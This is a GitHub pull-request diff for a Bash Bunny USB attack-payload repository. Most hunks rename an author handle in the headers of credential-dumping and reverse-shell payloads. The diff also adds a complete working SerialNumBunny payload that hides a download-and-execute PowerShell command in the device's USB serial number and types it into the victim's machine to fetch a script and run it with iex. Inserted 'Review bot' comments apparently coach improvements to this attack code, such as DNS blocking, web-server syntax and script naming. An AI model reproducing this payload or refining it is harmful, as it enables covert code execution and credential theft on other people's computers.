Merge pull request #655 from 0i41E/master

Uploaded SerialNumBunny
pull/614/merge
Peaks 2024-06-09 16:30:16 -04:00 committed by GitHub
commit fddae91cc5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
27 changed files with 113 additions and 33 deletions

View File

@ -1,7 +1,7 @@
# Title: FireSnatcher # Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases # Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3 # Author: KarrotKak3
# Props: saintcrossbow & 0iphor13 # Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress) # Version: 1.0.2.0 (Work in Progress)
# Category: Credentials # Category: Credentials
# Target: Windows (Logged in) # Target: Windows (Logged in)

View File

@ -1,7 +1,7 @@
# Title: FireSnatcher # Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases # Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3 # Author: KarrotKak3
# Props: saintcrossbow & 0iphor13 # Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress) # Version: 1.0.2.0 (Work in Progress)
# Category: Credentials # Category: Credentials
# Target: Windows (Logged in) # Target: Windows (Logged in)

View File

@ -1,6 +1,6 @@
**Title: HashDumpBunny** **Title: HashDumpBunny**
Author: 0iphor13 Author: 0i41E
Version: 1.0 Version: 1.0
@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
# #
Plug in BashBunny. Plug in BashBunny.
Exfiltrate the out.txt file and try to crack the hashes. Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
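Review bot: moving the image URLs off the old handle, as this hunk does, is the right call for more than cosmetics: GitHub only redirects a renamed account's URLs until someone registers the old name, at which point every remaining `0iphor13/...` link would resolve to whatever that person hosts. Since this PR already touches 27 files, grep the rest of the repository for `0iphor13` so no stale link survives outside these hunks.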

View File

@ -2,7 +2,7 @@
# #
# Title: HashDumpBunny # Title: HashDumpBunny
# Description: Dump user hashes with this script, which was obfuscated with multiple layers. # Description: Dump user hashes with this script, which was obfuscated with multiple layers.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: MiniDumpBunny** **Title: MiniDumpBunny**
Author: 0iphor13 Author: 0i41E
Version: 1.0 Version: 1.0
@ -14,4 +14,4 @@ What is MiniDumpBunny?
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away. Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
# #
Exfiltrate the .dmp file and read it with Mimikatz. Exfiltrate the .dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)

View File

@ -2,7 +2,7 @@
# #
# Title: MiniDumpBunny # Title: MiniDumpBunny
# Description: Dump lsass with this script, which was obfuscated with multiple layers. # Description: Dump lsass with this script, which was obfuscated with multiple layers.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: ProcDumpBunny** **Title: ProcDumpBunny**
Author: 0iphor13 Author: 0i41E
Version: 1.0 Version: 1.0
@ -12,10 +12,10 @@ What is ProcDumpBunny?
**Instruction:** **Instruction:**
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
Place Bunny.exe in the same payload switch as your payload Place Bunny.exe in the same payload switch as your payload
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
# #
Plug in BashBunny. Plug in BashBunny.
Exfiltrate the out.dmp file and read it with Mimikatz. Exfiltrate the out.dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)

View File

@ -2,7 +2,7 @@
# #
# Title: ProcDumpBunny # Title: ProcDumpBunny
# Description: Dump lsass.exe with a renamed version of procdump # Description: Dump lsass.exe with a renamed version of procdump
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: SamDumpBunny** **Title: SamDumpBunny**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.0<br> Version: 1.0<br>
@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.** **!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) ![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
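Review bot: the updated image link in this README still points at a different repository (`0i41E/omg-payloads`, folder `SamDumpCable`) rather than at this payload's own folder, so the screenshot breaks if that repository is reorganised or the file is removed there. While the URL is being edited anyway, copy `sam.png` into `SamDumpBunny/` and reference it locally; the ReverseBunnySSL README below has the same cross-repository dependency on `ReverseCableSSL/CreateCert.png`.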

View File

@ -2,7 +2,7 @@
# #
# Title: SamDumpBunny # Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. # Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

View File

@ -1,6 +1,6 @@
**Title: SessionBunny** **Title: SessionBunny**
Author: 0iphor13 Author: 0i41E
(Credit for SessionGopher: Brandon Arvanaghi) (Credit for SessionGopher: Brandon Arvanaghi)
Version: 1.0 Version: 1.0
@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
# #
Plug in BashBunny. Plug in BashBunny.
Wait for the script to finish and decide what you wanna do with the information gathered Wait for the script to finish and decide what you wanna do with the information gathered
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)

View File

@ -43,7 +43,7 @@
o o
o_ o_
/ ". SessionGopher / ". SessionGopher
," _-" Bunny Edition (0iphor13) ," _-" Bunny Edition (0i41E)
," m m ," m m
..+ ) Brandon Arvanaghi ..+ ) Brandon Arvanaghi
`m..m @arvanaghi | arvanaghi.com `m..m @arvanaghi | arvanaghi.com

View File

@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# Title: SessionBunny # Title: SessionBunny
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

View File

@ -0,0 +1,15 @@
#This is just an example script, you may want to replace it with a script of your choice
$Picture=@"
_____ _____ _____ _____ _____ _____ _____ _____ __ __
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
Bash Bunny by Hak5 USB Attack/Automation Platform
"@
Sleep -s 5
Write-Host -ForegroundColor red "$Picture"
Sleep -s 2
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"
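Review bot: `Sleep -s 5` and `Sleep -s 2` depend on the `Sleep` alias and an abbreviated parameter name; in an example script that readers are told to adapt, spell them out as `Start-Sleep -Seconds 5` and `Start-Sleep -Seconds 2`. The first-line comment also lacks the space after `#` that the other scripts in this set use, and the quotes around `"$Picture"` are redundant for a here-string variable passed to `Write-Host`.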

Binary file not shown (added image, 31 KiB).

View File

@ -0,0 +1,46 @@
#!/bin/bash
#
# Title: SerialNumBunny
# Description: Execute strings placed in the Bunny serial number
# Author: 0i41E
# Version: 1.0
# Category: Execution
# Attackmodes: HID, RNDIS_ETHERNET
# Starting as Ethernet device only first to get IP
LED SETUP
ATTACKMODE RNDIS_ETHERNET
GET SWITCH_POSITION
GET HOST_IP
# Switch to Ethernet & HID
LED Y
# Defining Device Identifiers - Serialnumber contains payload
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell"
Q DELAY 500
Q ENTER
Q DELAY 1000
# Make sure that device ID matches what was defined above
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
Q DELAY 400
Q ENTER
LED FINISH
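Review bot: the `iptables -A OUTPUT -p udp --dport 53 -j DROP` line under `# disallow outgoing dns requests` is appended on every run and never removed, so repeated runs stack duplicate rules and the device's outbound DNS stays blocked after the payload has finished; guard the insert with `iptables -C ... 2>/dev/null || iptables -A ...` and delete the rule with `-D` before `LED FINISH`. Two further checks: `python -m SimpleHTTPServer 80` exists only under Python 2, so confirm which interpreter the firmware's `python` is (`python3 -m http.server 80` is the Python 3 equivalent), and the serial-number constraints the README states (a character limit of about 40 and underscores in place of spaces) belong in a comment next to the `ATTACKMODE ... SN_...` line here, since that is where anyone editing the value will be looking.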

View File

@ -0,0 +1,19 @@
**Title: SerialNumBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
**What is SerialNumBunny?**
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
**Instruction:**
- Upload your script or the example provided onto your Bunnys switch folder.
- Plug in the Bunny and let the magic happen.
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._
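Review bot: the instruction "Upload your script or the example provided onto your Bunnys switch folder" omits that the file must be named `1.ps1`, because payload.txt hardcodes `HTTP://$HOST_IP/1.PS1` in the serial number; without that sentence a renamed script is silently served as a 404. Also, the `<p>` opened on the `Author:` line is never closed, unlike the other READMEs in this set, and "Bunnys" should read "Bunny's".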

View File

@ -2,7 +2,7 @@
# #
# Title: WifiSnatch # Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs # Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13 # Author: 0i41E
# Version: 1.1 # Version: 1.1
# Category: Exfiltration # Category: Exfiltration
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

View File

@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/) * [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG) * [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13) * [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter) * [PhilSutter](https://github.com/PhilSutter)

View File

@ -93,7 +93,7 @@ I am Jakoby
* [Hak5](https://hak5.org/) * [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG) * [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13) * [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter) * [PhilSutter](https://github.com/PhilSutter)

View File

@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
# #
# Modified by 0iphor13 for PingZhellBunny # Modified by 0i41E for PingZhellBunny
# #
# #
# #

View File

@ -1,6 +1,6 @@
**Title: PingZhellBunny** **Title: PingZhellBunny**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.5<br> Version: 1.5<br>

View File

@ -2,7 +2,7 @@
# #
# Title: PingZhellBunny # Title: PingZhellBunny
# Description: Getting remote access via ICMP # Description: Getting remote access via ICMP
# Author: 0iphor13 # Author: 0i41E
# Version: 1.5 # Version: 1.5
# Category: Remote_Access # Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET

View File

@ -1,6 +1,6 @@
**Title: ReverseBunny** **Title: ReverseBunny**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.5<br> Version: 1.5<br>
@ -8,7 +8,7 @@ Version: 1.5<br>
<p>!Getting remote access via obfuscated reverse shell!<br> <p>!Getting remote access via obfuscated reverse shell!<br>
Upload payload.txt and RevBunny.ps1 onto your Bunny Upload payload.txt and RevBunny.ps1 onto your Bunny
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p> Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>

View File

@ -2,7 +2,7 @@
# #
# Title: ReverseBunny # Title: ReverseBunny
# Description: Get remote access, using an obfuscated powershell reverse shell. # Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.5 # Version: 1.5
# Category: Remote_Access # Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET

View File

@ -1,6 +1,6 @@
**Title: ReverseBunnySSL** **Title: ReverseBunnySSL**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.2<br> Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p> For input and inspiration - Thanks to: Cribbit, sebkinne</p>
@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell** **Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png) ![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

View File

@ -2,7 +2,7 @@
# #
# Title: ReverseBunnySSL # Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell. # Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.2 # Version: 1.2
# Category: Remote_Access # Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET